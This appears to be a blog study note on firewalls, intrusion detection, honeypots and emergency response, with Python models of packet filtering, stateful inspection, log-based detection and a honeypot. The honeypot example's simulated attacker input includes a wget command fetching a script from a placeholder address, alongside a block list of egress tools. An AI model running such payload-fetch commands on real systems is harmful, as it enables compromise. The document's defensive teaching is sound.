Information security technology - (7) Security protection and emergency response technology

1. Basic types and principles of firewalls

1.1 Firewall technology

A firewall is a network security device, or a system made up of several hardware devices and the corresponding software, placed between an untrusted external network and a protected internal network. Its purpose is to protect the internal network from attacks originating on the external network and to enforce a defined access control policy.

1.2 Characteristics of firewalls

  • All traffic between the internal network and the external network, in both directions, passes through it.
  • Only traffic that satisfies the internal access control policy is allowed through.
  • The firewall itself has high computing and communication processing capacity, so that it does not become a bottleneck.

1.3 Functions of firewall

1.3.1 Filtering unsecured services and communications

  • Block pings (ICMP echo requests) from the external network
  • Block information services that internal hosts offer without authorization
  • Prevent information leakage

1.3.2 Prohibit unauthorized users from accessing the internal network

  • Reject traffic from specific (blocked) addresses
  • Authenticate external connections

1.3.3 Control access to the intranet

  • Allow external access only to the WWW, FTP and mail servers inside the internal network, and to no other hosts
  • Log the related access events

1.4 Basic contents of firewall

1.4.1 Packet filtering firewall


  1. Definition
    A packet filtering firewall controls traffic per protocol by checking the protocol type, controls traffic from a specific source address or to a specific destination address by checking the IP addresses, and, because each service on a TCP/IP network corresponds to a port, controls access to external services and the exposure of internal services by checking the port numbers. The operator of the packet filtering firewall is responsible for formulating these rules and configuring them into the firewall system.
  2. Advantages and disadvantages
    (figure from the original post, not reproduced)
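As an added example (not code from the original post), the following Python model shows how a packet filtering firewall evaluates a first-match rule list against protocol, source and destination address and destination port, and how such rules implement the three functions of section 1.3. The address ranges, server addresses and sample packets are assumed for illustration. The last rule also shows the weakness of a stateless filter: return traffic for connections opened from inside has to be admitted on the ACK flag alone, so an ACK-flagged probe to any internal host passes as well.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    """Header fields a packet filter looks at (constructed model, not a real parser)."""
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    sport: int = 0
    dport: int = 0
    flags: str = ""       # TCP flags as letters: "S" = SYN, "A" = ACK, "SA" = SYN+ACK


@dataclass(frozen=True)
class Rule:
    """One filter rule; 'any' / None fields are wildcards. Rules are tried in order."""
    action: str                   # "allow" or "deny"
    proto: str = "any"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None
    ack_only: bool = False        # match only packets carrying the ACK flag

    def matches(self, p: Packet) -> bool:
        if self.proto != "any" and self.proto != p.proto:
            return False
        if ip_address(p.src) not in ip_network(self.src):
            return False
        if ip_address(p.dst) not in ip_network(self.dst):
            return False
        if self.dport is not None and self.dport != p.dport:
            return False
        if self.ack_only and "A" not in p.flags:
            return False
        return True


INTERNAL = "10.0.0.0/8"          # assumed internal address range
WEB_SERVER = "10.0.1.10/32"      # assumed published web server
MAIL_SERVER = "10.0.1.20/32"     # assumed published mail server

# Rule set applied to packets arriving on the EXTERNAL interface; first match wins.
INBOUND_RULES: List[Rule] = [
    # 1.3.1: block pings from outside
    Rule("deny", proto="icmp"),
    # 1.3.2: a packet from outside must never claim an internal source address
    Rule("deny", src=INTERNAL),
    # 1.3.3: outsiders may reach only the published services
    Rule("allow", proto="tcp", dst=WEB_SERVER, dport=80),
    Rule("allow", proto="tcp", dst=MAIL_SERVER, dport=25),
    # Return traffic for connections that internal hosts opened. A stateless
    # filter cannot know which connections exist, so it relies on the ACK flag,
    # and an attacker can set that flag on probes (the "ACK scan" weakness).
    Rule("allow", proto="tcp", dst=INTERNAL, ack_only=True),
]


def filter_packet(rules: List[Rule], p: Packet, default: str = "deny") -> str:
    """Return the action of the first matching rule, or the default (deny) if none match."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return default


if __name__ == "__main__":
    samples = [
        ("ping from outside", Packet("203.0.113.5", "10.0.1.10", "icmp")),
        ("HTTP to web server", Packet("203.0.113.5", "10.0.1.10", "tcp", 51000, 80, "S")),
        ("SSH to internal host", Packet("203.0.113.5", "10.0.0.7", "tcp", 51001, 22, "S")),
        ("spoofed internal source", Packet("10.0.0.3", "10.0.1.10", "tcp", 51002, 80, "S")),
        ("reply to internal client", Packet("203.0.113.5", "10.0.0.7", "tcp", 443, 51003, "A")),
        ("ACK-scan probe to SSH", Packet("203.0.113.5", "10.0.0.7", "tcp", 51004, 22, "A")),
    ]
    for name, pkt in samples:
        print(f"{name:28s} -> {filter_packet(INBOUND_RULES, pkt)}")
```

The default action is deny, so anything the operator did not explicitly publish is dropped; the spoofed-source and ping cases are caught by the early deny rules regardless of destination.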

1.4.2 Proxy gateway

  1. Definition
    Connection requests from the external network are generally regarded as untrusted. A proxy gateway is a gateway device or system that runs a connection proxy program and is set up to protect the internal network. According to a defined security policy it decides whether an external network's access request to the internal network may be passed to the corresponding internal server. If it may, the proxy connects to the internal server on behalf of the external user and connects to the external user on behalf of the internal server, so the two sides never exchange packets directly.
  2. Circuit-level proxy
    A circuit-level proxy (also called a loop-layer proxy) is built on the transport layer: it relays TCP connections according to policy without interpreting the application protocol.
  3. Application-level proxy
    An application-level proxy is written specifically for a particular application or service, so it understands that protocol and can filter at the level of application commands and content.

1.4.3 Packet inspection firewall

Building on the packet filtering firewall, a packet inspection firewall does not limit its checks to the IP header: it may also inspect the TCP header (for example the flags) and the data carried in the TCP segment. Richer and more flexible security policies can therefore be enforced, at some computational cost.
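An added example that goes one step beyond the text: a packet inspection firewall that keeps per-connection state by following the TCP handshake (the usual "stateful inspection" implementation, assumed here rather than stated on the page) and additionally checks the TCP payload of one published service. The addresses, the published service list and the packet sequence are constructed. Contrast this with a stateless filter that admits return traffic on the ACK flag: here an ACK-flagged probe without a matching connection entry is dropped.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class TcpPacket:
    """The TCP fields the inspector looks at (constructed model, not a real parser)."""
    src: str
    sport: int
    dst: str
    dport: int
    flags: str            # "S", "SA", "A", "PA", "FA", "R" ...
    payload: bytes = b""


HTTP_METHODS = (b"GET ", b"HEAD ", b"POST ", b"PUT ", b"DELETE ", b"OPTIONS ")
OPEN = {"ESTABLISHED", "CLOSING"}


class StatefulInspector:
    """Tracks TCP connections through their handshake and accepts only packets that
    belong to a known connection. Inbound SYNs are allowed only to published services;
    data sent to port 80 must look like an HTTP request (a simple data-level check)."""

    def __init__(self, published: Set[Tuple[str, int]]):
        self.published = published
        self.table: Dict[Tuple[str, int, str, int], str] = {}   # initiator 4-tuple -> state

    @staticmethod
    def _fwd(p):          # key as seen from the packet's sender
        return (p.src, p.sport, p.dst, p.dport)

    @staticmethod
    def _rev(p):          # key of the opposite direction
        return (p.dst, p.dport, p.src, p.sport)

    def process(self, p: TcpPacket, direction: str) -> str:
        """direction is 'in' (arriving from the external network) or 'out'."""
        fwd, rev = self._fwd(p), self._rev(p)
        if "R" in p.flags:                          # reset tears the connection down
            known = fwd in self.table or rev in self.table
            self.table.pop(fwd, None)
            self.table.pop(rev, None)
            return "accept" if known else "drop"
        if p.flags == "S":                          # new connection attempt
            if direction == "in" and (p.dst, p.dport) not in self.published:
                return "drop"
            self.table[fwd] = "SYN_SENT"
            return "accept"
        if p.flags == "SA" and self.table.get(rev) == "SYN_SENT":
            self.table[rev] = "SYN_RECEIVED"
            return "accept"
        if "A" in p.flags and self.table.get(fwd) == "SYN_RECEIVED":
            self.table[fwd] = "ESTABLISHED"
            return "accept"
        if "A" in p.flags:
            if self.table.get(fwd) in OPEN:         # data from the initiator
                if p.dport == 80 and p.payload and not p.payload.startswith(HTTP_METHODS):
                    return "drop"                   # payload check on the request
                if "F" in p.flags:
                    self.table[fwd] = "CLOSING"     # a real table also expires entries
                return "accept"
            if self.table.get(rev) in OPEN:         # data from the responder
                if "F" in p.flags:
                    self.table[rev] = "CLOSING"
                return "accept"
            return "drop"                           # no connection: e.g. an ACK-scan probe
        return "drop"


def run_scenarios() -> List[Tuple[str, str]]:
    """Constructed packet sequence; returns (description, decision) pairs."""
    fw = StatefulInspector(published={("10.0.1.10", 80)})
    ext, web, client = "203.0.113.5", "10.0.1.10", "10.0.0.7"
    steps = [
        ("external SYN to web server", TcpPacket(ext, 51000, web, 80, "S"), "in"),
        ("web server SYN-ACK", TcpPacket(web, 80, ext, 51000, "SA"), "out"),
        ("external ACK completes handshake", TcpPacket(ext, 51000, web, 80, "A"), "in"),
        ("HTTP request", TcpPacket(ext, 51000, web, 80, "PA", b"GET / HTTP/1.1\r\n"), "in"),
        ("non-HTTP bytes on port 80", TcpPacket(ext, 51000, web, 80, "PA", b"\x16\x03\x01"), "in"),
        ("ACK-scan probe to internal host", TcpPacket(ext, 51001, client, 22, "A"), "in"),
        ("external SYN to internal host", TcpPacket(ext, 51002, client, 22, "S"), "in"),
        ("internal client SYN out", TcpPacket(client, 52000, ext, 443, "S"), "out"),
        ("external SYN-ACK back", TcpPacket(ext, 443, client, 52000, "SA"), "in"),
        ("client ACK", TcpPacket(client, 52000, ext, 443, "A"), "out"),
        ("external data to client", TcpPacket(ext, 443, client, 52000, "PA", b"\x16\x03\x03"), "in"),
    ]
    return [(name, fw.process(pkt, d)) for name, pkt, d in steps]


if __name__ == "__main__":
    for name, decision in run_scenarios():
        print(f"{name:34s} -> {decision}")
```

The connection table is the "computational cost" the text mentions: every packet costs a lookup and the table must be bounded and expired, otherwise a flood of SYNs from outside to the published service fills it.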

1.4.4 Hybrid firewall

Integrates a variety of firewall technologies, including:

  • IP packet filtering for low-level control of traffic;
  • packet inspection to widen the range of enforceable security policies;
  • a circuit-level proxy to secure connection establishment;
  • application-level proxies to secure the applications themselves.

2. Intrusion detection technology

2.1 Definition

Intrusion detection is a class of security technology for detecting behaviour that compromises, or attempts to compromise, the confidentiality, integrity or availability of a system. Detection equipment deployed in the protected network or system monitors its state and activity; from the collected data, detection methods identify unauthorized or malicious system and network behaviour and provide the means to respond to and prevent intrusions.

2.2 Three tasks

  • Collect data from networks and systems and extract features that describe network and system behaviour
  • Determine, efficiently and accurately, the nature of network and system behaviour from that data and those features
  • Respond to intrusions against the network and system

2.3 Intrusion detection (IDS) system structure

(figure from the original post, not reproduced)

2.4 Types of Intrusion Detection (IDS)

  • Host-based IDS:
    runs on the monitored host, or on a separate host, and looks for signs of intrusion in the host's audit data and system logs.
  • Network-based IDS:
    monitors a network segment and detects intrusions from captured network traffic, possibly combined with the audit data and logs of one or more hosts.

2.5 Methods of analysis and detection

2.5.1 Misuse detection

Build behavioural patterns of the various types of intrusion, identify and encode them, and collect them in a misuse pattern library; data from the data sources is then analysed to check whether it contains a known misuse pattern. Disadvantage: only known attacks can be detected.

2.5.2 Anomaly detection

Measure how far system behaviour or user behaviour deviates from a normal usage profile (NUP), and respond to behaviour that exceeds the thresholds or permitted range of variation. Its strength is that previously unknown attacks can be caught; its weakness is a higher false-alarm rate when the profile is poorly built.

2.5.3 Other detection methods

  • detection modelled on the biological immune system
  • adaptive detection systems

2.6 Intrusion response

2.6.1 Passive response

Passive response: raise an alarm once an attack is detected and present the information to administrators or users, who decide what measures to take.

2.6.2 Active response

Active response: according to the configured policy, block the attack in progress, or otherwise disrupt or limit the attack and its recurrence.
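An added example, not from the original post, covering the two analysis methods of section 2.5 and the active response of section 2.6 on constructed sshd-style log lines. Misuse detection matches a small library of known-bad patterns; anomaly detection builds a normal usage profile of failed logins per source from assumed baseline counts and flags sources beyond the mean plus three standard deviations; the active response turns alerts into time-limited block entries while honouring an allowlist. Log lines, baseline counts, signatures and addresses are all constructed.

```python
import re
import statistics
from collections import Counter
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sshd-style log lines (not captured from a real host).
LOG_LINES = """\
Mar  1 10:00:01 gw sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 50001 ssh2
Mar  1 10:00:03 gw sshd[1202]: Failed password for bob from 10.0.0.6 port 50002 ssh2
Mar  1 10:00:05 gw sshd[1203]: Failed password for invalid user admin from 203.0.113.9 port 4101 ssh2
Mar  1 10:00:07 gw sshd[1204]: Failed password for invalid user oracle from 203.0.113.9 port 4102 ssh2
Mar  1 10:00:09 gw sshd[1205]: Failed password for invalid user test from 203.0.113.9 port 4103 ssh2
Mar  1 10:00:11 gw sshd[1206]: Failed password for root from 203.0.113.9 port 4104 ssh2
Mar  1 10:00:12 gw sshd[1207]: Accepted password for bob from 10.0.0.6 port 50003 ssh2
Mar  1 10:00:13 gw sshd[1208]: Failed password for root from 203.0.113.9 port 4105 ssh2
Mar  1 10:00:15 gw sshd[1209]: Failed password for root from 203.0.113.9 port 4106 ssh2
Mar  1 10:00:40 gw sshd[1210]: Accepted password for root from 203.0.113.9 port 4110 ssh2
""".splitlines()

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

# Misuse detection: a library of known-bad patterns, each with a name (constructed).
MISUSE_SIGNATURES = [
    ("root-password-login", re.compile(r"Accepted password for root from")),
    ("invalid-user-probe", re.compile(r"Failed password for invalid user")),
]


def parse(lines: Iterable[str]) -> List[dict]:
    """Extract result, method, user and source ip from each authentication line."""
    out = []
    for line in lines:
        m = AUTH_RE.search(line)
        if m:
            out.append(m.groupdict())
    return out


def misuse_detect(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (signature name, source ip) for every line matching a known pattern."""
    hits = []
    for line in lines:
        for name, pattern in MISUSE_SIGNATURES:
            if pattern.search(line):
                m = AUTH_RE.search(line)
                hits.append((name, m.group("ip") if m else "?"))
    return hits


# Anomaly detection: the normal usage profile (NUP) is the distribution of failed
# logins per source in one window, built here from assumed counts from normal days.
BASELINE_FAILURES_PER_SOURCE = [0, 1, 1, 0, 2, 1, 0, 1]


def anomaly_threshold(baseline: List[int], k: float = 3.0) -> float:
    """Mean plus k standard deviations of the baseline profile."""
    return statistics.mean(baseline) + k * statistics.pstdev(baseline)


def anomaly_detect(lines: Iterable[str],
                   baseline: List[int] = BASELINE_FAILURES_PER_SOURCE) -> Dict[str, int]:
    """Sources whose failure count in the window exceeds the profile threshold."""
    failures = Counter(e["ip"] for e in parse(lines) if e["result"] == "Failed")
    limit = anomaly_threshold(baseline)
    return {ip: n for ip, n in failures.items() if n > limit}


def plan_active_response(alert_ips: Iterable[str], allowlist: Set[str],
                         ttl_seconds: int = 900) -> Dict[str, int]:
    """Active response: time-limited blocks for alerting sources. The time limit and
    the allowlist matter because an attacker who spoofs source addresses could
    otherwise use the IDS to lock out legitimate hosts (a self-inflicted denial of
    service); the allowlist is assumed to hold management addresses."""
    return {ip: ttl_seconds for ip in sorted(set(alert_ips)) if ip not in allowlist}


if __name__ == "__main__":
    print("misuse hits:", misuse_detect(LOG_LINES))
    anomalies = anomaly_detect(LOG_LINES)
    print("anomalies  :", anomalies, "threshold =", round(anomaly_threshold(BASELINE_FAILURES_PER_SOURCE), 2))
    print("blocks     :", plan_active_response(anomalies, allowlist={"10.0.0.5", "10.0.0.6"}))
```

Note that the two methods disagree on the last line: the successful root password login from the attacking source is invisible to the anomaly detector (it is one event, not a deviation in failure rate) but is caught by the misuse signature, which is why production sensors run both.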

3. Principle of “honeypot” technology

3.1 Definition

Honeypot technology is a class of techniques for collecting information about attacks and attackers: attackers are induced to break into a honeypot, and the system collects and analyses the resulting information.

3.2 Classification

  • By purpose: production honeypots (deployed to protect a real network) and research honeypots (deployed to study attackers)
  • By interaction level: low-interaction (emulated services) and high-interaction (real systems)
  • By implementation: real (physical) and virtual

3.3 Steps

Disguise and Introduce >> Information Control >> Data Capture and Analysis
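An added example, not from the original post: a deterministic model of a low-interaction honeypot session that follows the three steps above. The fake banner, the canned command outputs and the attacker's input are constructed. Disguise is the Linux-like responses; information control is the refusal of commands that would fetch payloads or reach other hosts; data capture and analysis are the event log and its summary. A real honeypot would wrap handle_session around a listening socket and add timestamps.

```python
from typing import Dict, List, Tuple

# Canned answers make the honeypot look like a small Linux box (disguise) without
# running anything real. Constructed for this example.
FAKE_RESPONSES: Dict[str, str] = {
    "uname -a": "Linux db01 4.19.0-21-amd64 #1 SMP x86_64 GNU/Linux",
    "id": "uid=0(root) gid=0(root) groups=0(root)",
    "cat /etc/passwd": "root:x:0:0:root:/root:/bin/bash\noracle:x:1001:1001::/home/oracle:/bin/bash",
    "ls": "backup.sql  notes.txt",
}
PROMPT = "root@db01:~# "
# Information control: tools an intruder would use to fetch payloads or move
# laterally are refused, so the honeypot cannot be turned against other hosts.
EGRESS_COMMANDS = ("wget", "curl", "tftp", "nc", "ssh", "scp")


def handle_session(src_ip: str, attacker_lines: List[str]) -> Tuple[List[str], List[dict]]:
    """Simulate one low-interaction telnet-style session. Returns the text the
    attacker would see and the events captured for later analysis."""
    replies: List[str] = ["login: "]
    events: List[dict] = []
    state = "login"
    username = ""
    for raw in attacker_lines:
        line = raw.strip()
        if state == "login":
            username = line
            replies.append("Password: ")
            state = "password"
        elif state == "password":
            # Any credential pair is "accepted": the point is to record what was tried.
            events.append({"src": src_ip, "type": "credentials", "user": username, "password": line})
            replies.append("Last login: Mon Mar  1 09:12:44 from 10.0.0.5\n" + PROMPT)
            state = "shell"
        else:  # shell
            if line == "exit":
                events.append({"src": src_ip, "type": "logout"})
                replies.append("logout")
                break
            word = line.split(" ", 1)[0] if line else ""
            if word in EGRESS_COMMANDS:
                events.append({"src": src_ip, "type": "blocked_egress", "command": line})
                replies.append(f"-bash: {word}: command not found\n" + PROMPT)
            else:
                events.append({"src": src_ip, "type": "command", "command": line})
                output = FAKE_RESPONSES.get(line, f"-bash: {word}: command not found")
                replies.append(output + "\n" + PROMPT)
    return replies, events


def summarize(events: List[dict]) -> Dict[str, list]:
    """Data analysis step: pull out the credentials tried and the commands run."""
    return {
        "credentials": [(e["user"], e["password"]) for e in events if e["type"] == "credentials"],
        "commands": [e["command"] for e in events if e["type"] == "command"],
        "blocked": [e["command"] for e in events if e["type"] == "blocked_egress"],
    }


if __name__ == "__main__":
    # Constructed attacker input: a typical credential guess followed by recon and a payload fetch.
    attacker = ["root", "123456", "uname -a", "wget http://203.0.113.9/x.sh", "cat /etc/passwd", "exit"]
    replies, events = handle_session("203.0.113.9", attacker)
    print("".join(replies))
    print(summarize(events))
```

Refusing egress commands with a plausible shell error keeps the session going (the attacker still reveals intent) while the honeypot never contacts the attacker's download host, which is the information-control step in practice.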

4. General steps for emergency response

4.1 Emergency response technology

Network and information system facilities may be damaged by a variety of causes, so preventive and reactive measures must be taken before and after such damage occurs; these measures are collectively called emergency response.

  • Early response: preventive measures taken before the system is attacked
  • Mid-term response: handling while the system is under attack, for example diverting the attacker into a honeypot or halting system operation
  • Later response: restoring the system after the attack

4.2 Construction of emergency response system

(figure from the original post, not reproduced)

5. Short answer questions

1. What is a firewall? What is the function?
2. What are the basic types of firewalls?
3. What is intrusion detection technology?
4. What is honeypot technology?
5. What is emergency response technology?


Source: blog.csdn.net/m0_63853448/article/details/127037272